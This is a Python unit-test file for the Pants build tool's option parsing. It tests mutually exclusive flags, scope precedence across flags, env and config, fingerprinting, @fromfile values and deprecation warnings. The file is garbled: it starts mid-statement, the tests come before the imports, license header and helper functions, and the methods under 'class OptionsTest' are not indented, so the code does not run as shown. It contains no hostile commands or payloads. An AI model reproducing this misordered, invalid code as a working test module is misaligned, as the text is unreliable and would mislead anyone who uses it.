            .global_delayed_deprecated_option
        )
        self.assertEqual(delayed_deprecation_option_value, "xxx")
        self.assertEqual(0, len(w))
    # Deprecation start version already passed: value works, warning emitted.
    with self.warnings_catcher() as w:
        delayed_passed_option_value = (
            self._parse(flags="--global-delayed-but-already-passed-deprecated-option=xxx")
            .for_global_scope()
            .global_delayed_but_already_passed_deprecated_option
        )
        self.assertEqual(delayed_passed_option_value, "xxx")
        self.assertOptionWarning(w, "global_delayed_but_already_passed_deprecated_option")
def test_mutually_exclusive_options(self) -> None:
    """Ensure error is raised when mutual exclusive options are given together.

    Conflicts are detected across all sources (flags, env, config), and the
    deprecated old-name/new-name pairing behaves as a mutex group too.

    Fix: the `--new-name=foo --old-name=bar` assertion was duplicated verbatim;
    the redundant copy has been removed.
    """

    def assert_mutually_exclusive_raised(
        *,
        flags: str,
        scope: Optional[str] = None,
        env: Optional[Dict[str, str]] = None,
        config: Optional[Dict[str, Dict[str, str]]] = None,
    ) -> None:
        # The error surfaces when the scope's values are materialized.
        with self.assertRaises(MutuallyExclusiveOptionError):
            options = self._parse(flags=flags, env=env, config=config)
            if scope:
                options.for_scope(scope)
            else:
                options.for_global_scope()

    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
    assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
    assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
    assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
    assert_mutually_exclusive_raised(
        flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
    )
    # Conflicts across sources (flag vs. env, flag vs. config) are also detected.
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
    assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
    assert_mutually_exclusive_raised(
        flags="stale --mutex-a=foo", env={"PANTS_STALE_MUTEX_B": "bar"}, scope="stale",
    )
    assert_mutually_exclusive_raised(
        flags="stale --crufty-new=foo", env={"PANTS_STALE_CRUFTY_OLD": "bar"}, scope="stale",
    )
    assert_mutually_exclusive_raised(
        flags="--mutex-foo=foo", config={"GLOBAL": {"mutex_bar": "bar"}},
    )
    assert_mutually_exclusive_raised(
        flags="--new-name=foo", config={"GLOBAL": {"old_name": "bar"}},
    )
    assert_mutually_exclusive_raised(
        flags="stale --mutex-a=foo", config={"stale": {"mutex_b": "bar"}}, scope="stale",
    )
    assert_mutually_exclusive_raised(
        flags="stale --crufty-old=foo", config={"stale": {"crufty_new": "bar"}}, scope="stale",
    )

    def assert_other_option_also_set(
        *,
        flags: str = "",
        other_option: str,
        scope: Optional[str] = None,
        env: Optional[Dict[str, str]] = None,
        config: Optional[Dict[str, Dict[str, str]]] = None,
    ) -> None:
        # Setting any member of a mutex group also populates the group's dest.
        options = self._parse(flags=flags, env=env, config=config)
        scoped_options = options.for_global_scope() if not scope else options.for_scope(scope)
        assert getattr(scoped_options, other_option) == "orz"

    assert_other_option_also_set(flags="--mutex-foo=orz", other_option="mutex")
    assert_other_option_also_set(flags="--old-name=orz", other_option="new_name")
    assert_other_option_also_set(
        flags="stale --mutex-a=orz", other_option="crufty_mutex", scope="stale",
    )
    assert_other_option_also_set(
        flags="stale --crufty-old=orz", other_option="crufty_new", scope="stale",
    )
    assert_other_option_also_set(env={"PANTS_GLOBAL_MUTEX_BAZ": "orz"}, other_option="mutex")
    assert_other_option_also_set(env={"PANTS_OLD_NAME": "orz"}, other_option="new_name")
    assert_other_option_also_set(
        env={"PANTS_STALE_MUTEX_B": "orz"}, other_option="crufty_mutex", scope="stale",
    )
    assert_other_option_also_set(
        config={"stale": {"crufty_old": "orz"}}, other_option="crufty_new", scope="stale",
    )
def test_middle_scoped_options(self) -> None:
    """Make sure the rules for inheriting from a hierarchy of scopes.

    Values should follow
    1. A short circuit scan for a value from the following sources in-order:
    flags, env, config, hardcoded defaults
    2. Values for each source follow the . hierarchy scoping rule
    within that source.
    """
    # Short circuit using command line.
    options = self._parse(flags="--a=100 compile --a=99")
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Short circuit using config: the more specific "compile" section wins in its subtree.
    options = self._parse(config={"DEFAULT": {"a": 100}, "compile": {"a": 99}})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Short circuit using env: the scoped env var wins in its subtree.
    options = self._parse(env={"PANTS_A": "100", "PANTS_COMPILE_A": "99"})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Command line has precedence over config.
    options = self._parse(flags="compile --a=99", config={"DEFAULT": {"a": 100}})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Command line has precedence over environment.
    options = self._parse(flags="compile --a=99", env={"PANTS_A": "100"})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Env has precedence over config.
    options = self._parse(config={"DEFAULT": {"a": 100}}, env={"PANTS_COMPILE_A": "99"})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(99, options.for_scope("compile").a)
    self.assertEqual(99, options.for_scope("compile.java").a)

    # Command line global overrides the middle scope setting in the env.
    options = self._parse(flags="--a=100", env={"PANTS_COMPILE_A": "99"})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(100, options.for_scope("compile").a)
    self.assertEqual(100, options.for_scope("compile.java").a)

    # Command line global overrides the middle scope in config.
    options = self._parse(flags="--a=100 ", config={"compile": {"a": 99}})
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(100, options.for_scope("compile").a)
    self.assertEqual(100, options.for_scope("compile.java").a)

    # Env global overrides the middle scope in config.
    options = self._parse(
        flags="--a=100 ", config={"compile": {"a": 99}}, env={"PANTS_A": "100"}
    )
    self.assertEqual(100, options.for_global_scope().a)
    self.assertEqual(100, options.for_scope("compile").a)
    self.assertEqual(100, options.for_scope("compile.java").a)
def test_complete_scopes(self) -> None:
    """Options.complete_scopes fills in every intermediate scope implied by a task scope."""
    # A task scope implies all of its ancestor intermediate scopes.
    self.assertEqual(
        {intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
        set(Options.complete_scopes({task("foo.bar.baz")})),
    )
    # An explicitly supplied global scope is preserved alongside the implied ones.
    self.assertEqual(
        {global_scope(), intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
        set(Options.complete_scopes({GlobalOptions.get_scope_info(), task("foo.bar.baz")})),
    )
    # Explicitly supplying an intermediate scope does not duplicate it.
    self.assertEqual(
        {intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
        set(Options.complete_scopes({intermediate("foo"), task("foo.bar.baz")})),
    )
    # Independent scope hierarchies are each completed separately.
    self.assertEqual(
        {
            intermediate("foo"),
            intermediate("foo.bar"),
            task("foo.bar.baz"),
            intermediate("qux"),
            task("qux.quux"),
        },
        set(Options.complete_scopes({task("foo.bar.baz"), task("qux.quux")})),
    )
def test_get_fingerprintable_for_scope(self) -> None:
    # Note: tests handling recursive and non-recursive options from enclosing scopes correctly.
    options = self._parse(
        flags='--store-true-flag --num=88 compile.scala --num=77 --modifycompile="blah blah blah" '
        '--modifylogs="durrrr" -- -d -v'
    )

    # NB: Passthrough args end up on our `--modifypassthrough` arg.
    pairs = options.get_fingerprintable_for_scope("compile.scala")
    # Expected (type, value) pairs: modifycompile, the passthrough list,
    # store-true-flag from the global scope, and the compile.scala-scoped --num.
    self.assertEqual(
        [(str, "blah blah blah"), (str, ["-d", "-v"]), (bool, True), (int, 77)], pairs
    )
def test_fingerprintable(self) -> None:
    """Only options registered with fingerprint=True appear in the fingerprintable pairs."""
    flag_line = (
        "fingerprinting --fingerprinted=shall_be_fingerprinted "
        "--definitely-not-fingerprinted=shant_be_fingerprinted"
    )
    parsed = self._parse(flags=flag_line)
    fingerprint_pairs = parsed.get_fingerprintable_for_scope("fingerprinting")
    self.assertIn((str, "shall_be_fingerprinted"), fingerprint_pairs)
    self.assertNotIn((str, "shant_be_fingerprinted"), fingerprint_pairs)
def test_fingerprintable_inverted(self) -> None:
    # With invert=True and fingerprint_key="daemon", options NOT explicitly registered
    # daemon=False are included and explicit daemon=False ones are excluded
    # (see the "fingerprinting" registrations in _register).
    options = self._parse(
        flags="fingerprinting --inverted=shall_be_fingerprinted "
        "--definitely-not-inverted=shant_be_fingerprinted"
    )
    pairs = options.get_fingerprintable_for_scope(
        "fingerprinting", fingerprint_key="daemon", invert=True
    )
    self.assertIn((str, "shall_be_fingerprinted"), pairs)
    self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
    """Shared checks for @fromfile option values.

    :param parse_func: Callable of (dest, fromfile_path) -> Options; each caller supplies
        flags, env, or config as the source of the @fromfile reference.
    :param expected_append: Expected value of the append-typed option (defaults below).
    :param append_contents: File contents to use for the append-typed option.
    """

    def _do_assert_fromfile(dest, expected, contents):
        # Write `contents` to a temp file and verify the option materializes it via @<path>.
        with temporary_file(binary_mode=False) as fp:
            fp.write(contents)
            fp.close()
            options = parse_func(dest, fp.name)
            self.assertEqual(expected, options.for_scope("fromfile")[dest])

    _do_assert_fromfile(dest="string", expected="jake", contents="jake")
    _do_assert_fromfile(dest="intvalue", expected=42, contents="42")
    _do_assert_fromfile(
        dest="dictvalue",
        expected={"a": 42, "b": (1, 2)},
        contents=dedent(
            """
            {
              'a': 42,
              'b': (
                1,
                2
              )
            }
            """
        ),
    )
    _do_assert_fromfile(
        dest="listvalue",
        expected=["a", "1", "2"],
        contents=dedent(
            """
            ['a',
             1,
             2]
            """
        ),
    )

    expected_append = expected_append or [1, 2, 42]
    append_contents = append_contents or dedent(
        """
        [
         1,
         2,
         42
        ]
        """
    )
    _do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
    """@fromfile values work when supplied via command-line flags."""

    def parse_func(dest, fromfile):
        # Fix: the interpolated .replace() arguments must use a different quote
        # character than the enclosing f-string — reusing the same quote is a
        # SyntaxError on every Python before 3.12.
        return self._parse(flags=f"fromfile --{dest.replace('_', '-')}=@{fromfile}")

    # You can only append a single item at a time with append flags, ie: we don't override the
    # default list like we do with env of config. As such, send in a single append value here
    # instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
    self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
    """@fromfile values work when supplied via the config file."""

    def parse_func(dest, fromfile):
        fromfile_section = {dest: f"@{fromfile}"}
        return self._parse(flags="fromfile", config={"fromfile": fromfile_section})

    self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
    # @fromfile values work when supplied via scoped environment variables.
    def parse_func(dest, fromfile):
        return self._parse(
            flags="fromfile", env={f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"}
        )

    self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
    """A @fromfile with a .json suffix is parsed as JSON for a dict-typed option."""
    val = {"a": {"b": 1}, "c": [2, 3]}
    with temporary_file(suffix=".json", binary_mode=False) as fp:
        json.dump(val, fp)
        fp.close()
        # Fix: the original interpolated the constant {"dictvalue"} with the same
        # quote character as the enclosing f-string — a SyntaxError before
        # Python 3.12, and a needless interpolation of a literal in any case.
        options = self._parse(flags=f"fromfile --dictvalue=@{fp.name}")
        self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_yaml(self) -> None:
    """A @fromfile with a .yaml suffix is parsed as YAML for a dict-typed option."""
    val = {"a": {"b": 1}, "c": [2, 3]}
    with temporary_file(suffix=".yaml", binary_mode=False) as fp:
        yaml.safe_dump(val, fp)
        fp.close()
        # Fix: the original interpolated the constant {"dictvalue"} with the same
        # quote character as the enclosing f-string — a SyntaxError before
        # Python 3.12, and a needless interpolation of a literal in any case.
        options = self._parse(flags=f"fromfile --dictvalue=@{fp.name}")
        self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_error(self) -> None:
    # A @fromfile pointing at a nonexistent path raises when the value is materialized,
    # not at parse time.
    options = self._parse(flags="fromfile --string=@/does/not/exist")
    with self.assertRaises(FromfileError):
        options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
    # A doubled @@ escapes the fromfile syntax and yields a literal value with one leading @.
    options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
    self.assertEqual("@/does/not/exist", options.for_scope("fromfile").string)
def test_ranked_value_equality(self) -> None:
    # RankedValue equality must compare both the rank and the wrapped value.
    none = RankedValue(Rank.NONE, None)
    some = RankedValue(Rank.HARDCODED, "some")
    self.assertEqual(RankedValue(Rank.NONE, None), none)
    self.assertEqual(RankedValue(Rank.HARDCODED, "some"), some)
    self.assertNotEqual(some, none)
    self.assertEqual(some, RankedValue(Rank.HARDCODED, "some"))
    # Same rank, different value: not equal.
    self.assertNotEqual(some, RankedValue(Rank.HARDCODED, "few"))
    # Same value, different rank: not equal.
    self.assertNotEqual(some, RankedValue(Rank.CONFIG, "some"))
def test_pants_global_designdoc_example(self) -> None:
    # The example from the design doc.
    # Get defaults from config and environment.
    config = {
        "GLOBAL": {"b": "99"},
        "compile": {"a": "88", "c": "77"},
    }

    env = {"PANTS_COMPILE_C": "66"}

    options = self._parse(
        flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
    )

    self.assertEqual(1, options.for_global_scope().a)
    self.assertEqual(99, options.for_global_scope().b)
    # --c is only registered on the "compile" scope, so it does not exist globally.
    with self.assertRaises(AttributeError):
        options.for_global_scope().c

    self.assertEqual(1, options.for_scope("compile").a)
    self.assertEqual(2, options.for_scope("compile").b)
    self.assertEqual(66, options.for_scope("compile").c)

    self.assertEqual(3, options.for_scope("compile.java").a)
    self.assertEqual(2, options.for_scope("compile.java").b)
    self.assertEqual(4, options.for_scope("compile.java").c)
def test_invalid_option_errors(self) -> None:
    """Unrecognized flags error out, with misspelling suggestions where available."""
    self.maxDiff = None

    def parse_joined_command_line(*args):
        bootstrap_options = create_options(
            {
                GLOBAL_SCOPE: {
                    # Set the Levenshtein edit distance to search for misspelled options.
                    "option_name_check_distance": 2,
                    # If bootstrap option values are provided, this option is accessed and must be provided.
                    "spec_files": [],
                },
            }
        )
        return self._parse(
            flags=safe_shlex_join(list(args)),
            bootstrap_option_values=bootstrap_options.for_global_scope(),
        )

    # A single unrecognized flag with no close match.
    with self.assertRaisesWithMessage(
        ParseError,
        (
            "Unrecognized command line flag '--aasdf' on global scope.\n\n(Run `./pants "
            "help-advanced` for all available options.)"
        ),
    ):
        parse_joined_command_line("--aasdf").for_global_scope()

    # Multiple unrecognized flags, none with suggestions.
    with self.assertRaisesWithMessage(
        ParseError,
        (
            "Unrecognized command line flags on global scope: --aasdf, --aasdy.\n\n(Run "
            "`./pants help-advanced` for all available options.)"
        ),
    ):
        parse_joined_command_line("--aasdf", "--aasdy").for_global_scope()

    with self.assertRaisesWithMessage(
        ParseError,
        dedent(
            """\
            Unrecognized command line flags on global scope: -v, --config-overridden, --c.
            Suggestions:
            -v: [--v2, --verbose, --a, --b, --y, -n, -z, --compile-c]
            --config-overridden: [--config-override]
            --c: [--compile-c, --compile-scala-modifycompile, --compile-scala-modifylogs, --compile-scala-modifypassthrough, --config-override, --a, --b, --y, -n, -z, --v2]

            (Run `./pants help-advanced` for all available options.)"""
        ),
    ):
        parse_joined_command_line(
            # A nonexistent short-form option -- other short-form options should be displayed.
            "-vd",
            # An incorrect form of `--config-override=val` (`ridden` instead of `ride`) should
            # show the correct option name.
            "--config-overridden=val",
            # An option name without the correct prefix scope should match all flags with the
            # same or similar unscoped option names.
            "--c=[]",
        ).for_global_scope()

    # Test when only some flags have suggestions.
    with self.assertRaisesWithMessage(
        ParseError,
        (
            "Unrecognized command line flags on global scope: --aasdf, --config-overridden.\n"
            "Suggestions:\n"
            "--config-overridden: [--config-override]\n\n"
            "(Run `./pants help-advanced` for all available options.)"
        ),
    ):
        parse_joined_command_line("--aasdf", "--config-overridden").for_global_scope()

    with self.assertRaisesWithMessage(
        ParseError,
        dedent(
            """\
            Unrecognized command line flag '--sam' on scope 'simple'. Suggestions:
            --simple-spam, --simple-dashed-spam, --a, --num, --scoped-a-bit-spam, --scoped-and-dashed-spam

            (Run `./pants help-advanced simple` for all available options.)"""
        ),
    ):
        parse_joined_command_line(
            # Verify that misspelling searches work for options in non-global scopes.
            "--simple-sam=val",
        ).for_scope("simple")

    with self.assertRaisesWithMessage(
        ParseError,
        dedent(
            """\
            Unrecognized command line flag '--modifylogs' on scope 'compile'. Suggestions:
            --compile-scala-modifylogs

            (Run `./pants help-advanced compile` for all available options.)"""
        ),
    ):
        parse_joined_command_line(
            # Verify that options with too shallow scoping match the correct option.
            "--compile-modifylogs=val",
        ).for_scope("compile")

    with self.assertRaisesWithMessage(
        ParseError,
        dedent(
            """\
            Unrecognized command line flag '--modifylogs' on scope 'cache.compile.scala'.
            Suggestions:
            --compile-scala-modifylogs

            (Run `./pants help-advanced cache.compile.scala` for all available options.)"""
        ),
    ):
        parse_joined_command_line(
            # Verify that options with too deep scoping match the correct option.
            "--cache-compile-scala-modifylogs=val",
        ).for_scope("cache.compile.scala")
def test_pants_global_with_default(self) -> None:
    """This test makes sure values under [DEFAULT] still gets read."""
    # This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
    # tell us that we can remove the cast.
    config = cast(
        Dict[str, Dict[str, Any]], {"DEFAULT": {"b": "99"}, "GLOBAL": {"store_true_flag": True}}
    )
    global_options = self._parse(config=config).for_global_scope()
    self.assertEqual(99, global_options.b)
    self.assertTrue(global_options.store_true_flag)
def test_double_registration(self) -> None:
    """Registering the same flag twice on one scope raises OptionAlreadyRegistered."""
    opts = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=OptionsTest._known_scope_infos,
        args=shlex.split("./pants"),
    )
    opts.register(GLOBAL_SCOPE, "--foo-bar")
    with self.assertRaises(OptionAlreadyRegistered):
        opts.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
    # We serialize options to JSON e.g., when uploading stats.
    # This test spot-checks that enum types can be serialized.
    options = self._parse(flags="enum-opt --some-enum=another-value")
    # Should not raise: CoercingEncoder must handle the enum value in the dict.
    json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
def test_scope_deprecation(self) -> None:
    # Note: This test demonstrates that two different new scopes can deprecate the same
    # old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
    class DummyOptionable1(Optionable):
        options_scope = "new-scope1"
        options_scope_category = ScopeInfo.SUBSYSTEM
        deprecated_options_scope = "deprecated-scope"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"

    class DummyOptionable2(Optionable):
        options_scope = "new-scope2"
        options_scope_category = ScopeInfo.SUBSYSTEM
        deprecated_options_scope = "deprecated-scope"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"

    options = Options.create(
        env={},
        config=self._create_config(
            {
                "GLOBAL": {"inherited": "aa"},
                DummyOptionable1.options_scope: {"foo": "xx"},
                DummyOptionable1.deprecated_options_scope: {
                    "foo": "yy",
                    "bar": "zz",
                    "baz": "ww",
                    "qux": "uu",
                },
            }
        ),
        known_scope_infos=[
            global_scope(),
            DummyOptionable1.get_scope_info(),
            DummyOptionable2.get_scope_info(),
        ],
        args=shlex.split("./pants --new-scope1-baz=vv"),
    )

    options.register(GLOBAL_SCOPE, "--inherited")
    options.register(DummyOptionable1.options_scope, "--foo")
    options.register(DummyOptionable1.options_scope, "--bar")
    options.register(DummyOptionable1.options_scope, "--baz")
    options.register(DummyOptionable2.options_scope, "--qux")

    with self.warnings_catcher() as w:
        vals1 = options.for_scope(DummyOptionable1.options_scope)

    # Check that we got a warning, but not for the inherited option.
    single_warning_dummy1 = assert_single_element(w)
    self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
    self.assertNotIn("inherited", str(single_warning_dummy1.message))

    # Check values.
    # Deprecated scope takes precedence at equal rank.
    self.assertEqual("yy", vals1.foo)
    self.assertEqual("zz", vals1.bar)
    # New scope takes precedence at higher rank.
    self.assertEqual("vv", vals1.baz)

    with self.warnings_catcher() as w:
        vals2 = options.for_scope(DummyOptionable2.options_scope)

    # Check that we got a warning.
    single_warning_dummy2 = assert_single_element(w)
    self.assertEqual(single_warning_dummy2.category, DeprecationWarning)
    self.assertNotIn("inherited", str(single_warning_dummy2.message))

    # Check values.
    self.assertEqual("uu", vals2.qux)
def test_scope_deprecation_parent(self) -> None:
    # Note: This test demonstrates that a scope can mark itself as deprecating a subscope of
    # another scope.
    class DummyOptionable1(Optionable):
        options_scope = "test"
        options_scope_category = ScopeInfo.SUBSYSTEM

        @classmethod
        def register_options(cls, register):
            super().register_options(register)
            register("--bar")

    class DummyOptionable2(Optionable):
        options_scope = "lint"
        options_scope_category = ScopeInfo.SUBSYSTEM
        deprecated_options_scope = "test.a-bit-linty"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"

        @classmethod
        def register_options(cls, register):
            super().register_options(register)
            register("--foo")

    known_scope_infos = (
        [global_scope()]
        + list(DummyOptionable1.known_scope_infos())
        + list(DummyOptionable2.known_scope_infos())
    )
    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=known_scope_infos,
        args=shlex.split("./pants --test-a-bit-linty-foo=vv"),
    )

    # NB: Order matters here, because Optionables are typically registered in sorted order.
    DummyOptionable2.register_options_on_scope(options)
    DummyOptionable1.register_options_on_scope(options)

    with self.warnings_catcher() as w:
        vals = options.for_scope(DummyOptionable2.options_scope)

    # Check that we got a warning, but also the correct value.
    single_warning_dummy1 = assert_single_element(w)
    self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
    self.assertEqual("vv", vals.foo)
def test_scope_deprecation_defaults(self) -> None:
    # Confirms that a DEFAULT option does not trigger deprecation warnings for a deprecated scope.
    class DummyOptionable1(Optionable):
        options_scope = "new-scope1"
        options_scope_category = ScopeInfo.SUBSYSTEM
        deprecated_options_scope = "deprecated-scope"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"

    options = Options.create(
        env={},
        config=self._create_config(
            {"DEFAULT": {"foo": "aa"}, DummyOptionable1.options_scope: {"foo": "xx"}}
        ),
        known_scope_infos=[global_scope(), DummyOptionable1.get_scope_info()],
        args=shlex.split("./pants"),
    )

    options.register(DummyOptionable1.options_scope, "--foo")

    with self.warnings_catcher() as w:
        vals1 = options.for_scope(DummyOptionable1.options_scope)

    # Check that we got no warnings and that the actual scope took precedence.
    self.assertEqual(0, len(w))
    self.assertEqual("xx", vals1.foo)
def test_scope_dependency_deprecation(self) -> None:
    # Test that a dependency scope can be deprecated.
    class DummyOptionable1(Optionable):
        options_scope = "scope"
        options_scope_category = ScopeInfo.SUBSYSTEM

    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=[
            global_scope(),
            DummyOptionable1.get_scope_info(),
            # A deprecated, scoped dependency on `DummyOptionable1`. This
            # imitates the construction of SubsystemClientMixin.known_scope_infos.
            ScopeInfo(
                DummyOptionable1.subscope("sub"),
                ScopeInfo.SUBSYSTEM,
                DummyOptionable1,
                removal_version="9999.9.9.dev0",
                removal_hint="Sayonara!",
            ),
        ],
        args=shlex.split("./pants --scope-sub-foo=vv"),
    )

    options.register(DummyOptionable1.options_scope, "--foo")

    with self.warnings_catcher() as w:
        vals1 = options.for_scope(DummyOptionable1.subscope("sub"))

    # Check that we got a warning, but also the correct value.
    single_warning_dummy1 = assert_single_element(w)
    self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
    self.assertEqual("vv", vals1.foo)
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import shlex
import unittest.mock
from enum import Enum
from functools import partial
from textwrap import dedent
from typing import Any, Dict, List, Optional, Union, cast
import toml
import yaml
from packaging.version import Version
from pants.base.deprecated import CodeRemovedError
from pants.base.hash_utils import CoercingEncoder
from pants.option.config import Config
from pants.option.custom_types import UnsetBool, file_option, shell_str, target_option
from pants.option.errors import (
BooleanConversionError,
BooleanOptionNameWithNo,
FromfileError,
ImplicitValIsNone,
InvalidKwarg,
InvalidMemberType,
MemberTypeNotAllowed,
MutuallyExclusiveOptionError,
NoOptionNames,
OptionAlreadyRegistered,
OptionNameDash,
OptionNameDoubleDash,
ParseError,
RecursiveSubsystemOption,
Shadowing,
)
from pants.option.global_options import GlobalOptions
from pants.option.optionable import Optionable
from pants.option.options import Options
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.parser import Parser
from pants.option.ranked_value import Rank, RankedValue
from pants.option.scope import GLOBAL_SCOPE, ScopeInfo
from pants.testutil.option.fakes import create_options
from pants.testutil.test_base import TestBase
from pants.util.collections import assert_single_element
from pants.util.contextutil import temporary_file, temporary_file_path
from pants.util.dirutil import safe_mkdtemp
from pants.util.strutil import safe_shlex_join
# Version string passed as deprecation_start_version in the deprecation tests below.
_FAKE_CUR_VERSION = "1.0.0.dev0"


def global_scope() -> ScopeInfo:
    """ScopeInfo for the global scope."""
    return ScopeInfo(GLOBAL_SCOPE, ScopeInfo.GLOBAL, GlobalOptions)


def task(scope: str) -> ScopeInfo:
    """ScopeInfo for a task-category scope."""
    return ScopeInfo(scope, ScopeInfo.TASK)


def intermediate(scope: str) -> ScopeInfo:
    """ScopeInfo for an intermediate-category scope."""
    return ScopeInfo(scope, ScopeInfo.INTERMEDIATE)


def subsystem(scope: str) -> ScopeInfo:
    """ScopeInfo for a subsystem-category scope."""
    return ScopeInfo(scope, ScopeInfo.SUBSYSTEM)
class OptionsTest(TestBase):
@staticmethod
def _create_config(config: Optional[Dict[str, Dict[str, str]]] = None) -> Config:
    """Write `config` out as a TOML file in a temp dir and load it back as a Config."""
    with open(os.path.join(safe_mkdtemp(), "test_config.toml"), "w") as fp:
        toml.dump(config or {}, fp)
    return Config.load(config_paths=[fp.name])
def _parse(
    self,
    *,
    flags: str = "",
    env: Optional[Dict[str, str]] = None,
    config: Optional[Dict[str, Dict[str, Any]]] = None,
    bootstrap_option_values=None,
) -> Options:
    """Create an Options instance from flags/env/config and register the test options.

    :param flags: The command line, as one shell-style string (without the binary name).
    :param env: Environment variables.
    :param config: Config sections, written to a temp TOML file via _create_config.
    :param bootstrap_option_values: Pre-computed bootstrap option values, if any.
    """
    args = ["./pants", *shlex.split(flags)]
    options = Options.create(
        env=env or {},
        config=self._create_config(config),
        known_scope_infos=OptionsTest._known_scope_infos,
        args=args,
        bootstrap_option_values=bootstrap_option_values,
    )
    self._register(options)
    return options
# The scope hierarchy shared by every test in this class.
_known_scope_infos = [
    global_scope(),
    intermediate("compile"),
    task("compile.java"),
    task("compile.scala"),
    task("cache.compile.scala"),
    intermediate("stale"),
    intermediate("test"),
    task("test.junit"),
    subsystem("passconsumer"),
    task("simple"),
    task("simple-dashed"),
    task("scoped.a.bit"),
    task("scoped.and-dashed"),
    task("fromfile"),
    task("fingerprinting"),
    task("enum-opt"),
    task("separate-enum-opt-scope"),
]
class SomeEnumOption(Enum):
    # Enum used to exercise enum-typed option registration, parsing, and defaults.
    a_value = "a-value"
    another_value = "another-value"
def _register(self, options):
    """Register the full option inventory exercised by this class's tests."""

    def register_global(*args, **kwargs):
        # Shorthand for registering on the global scope.
        options.register(GLOBAL_SCOPE, *args, **kwargs)

    register_global("-z", "--verbose", type=bool, help="Verbose output.", recursive=True)
    register_global("-n", "--num", type=int, default=99, recursive=True, fingerprint=True)
    register_global("--y", type=list, member_type=int)
    register_global(
        "--v2", help="Two-letter long-form option, used to test option name suggestions."
    )
    register_global("--config-override", type=list)

    register_global("--pants-foo")
    register_global("--bar-baz")
    register_global("--store-true-flag", type=bool, fingerprint=True)
    register_global("--store-false-flag", type=bool, implicit_value=False)
    register_global("--store-true-def-true-flag", type=bool, default=True)
    register_global("--store-true-def-false-flag", type=bool, default=False)
    register_global(
        "--store-false-def-false-flag", type=bool, implicit_value=False, default=False
    )
    register_global(
        "--store-false-def-true-flag", type=bool, implicit_value=False, default=True
    )
    register_global("--def-unset-bool-flag", type=bool, default=UnsetBool)

    # Choices.
    register_global("--str-choices", choices=["foo", "bar"])
    register_global("--int-choices", choices=[42, 99], type=list, member_type=int)

    # Custom types.
    register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
    register_global("--dicty", type=dict, default='{"a": "b"}')
    register_global(
        "--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
    )
    register_global("--targety", type=target_option, default="//:a")
    register_global(
        "--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
    )
    register_global("--filey", type=file_option, default=None)
    register_global("--file-listy", type=list, member_type=file_option)
    register_global(
        "--shell-str-listy",
        type=list,
        member_type=shell_str,
        default="--default1 --default2=test",
    )

    # Implicit value.
    register_global("--implicit-valuey", default="default", implicit_value="implicit")

    # For the design doc example test.
    register_global("--a", type=int, recursive=True)
    register_global("--b", type=int, recursive=True)

    # Deprecated global options
    register_global(
        "--global-crufty",
        removal_version="999.99.9.dev0",
        removal_hint="use a less crufty global option",
    )
    register_global(
        "--global-crufty-boolean",
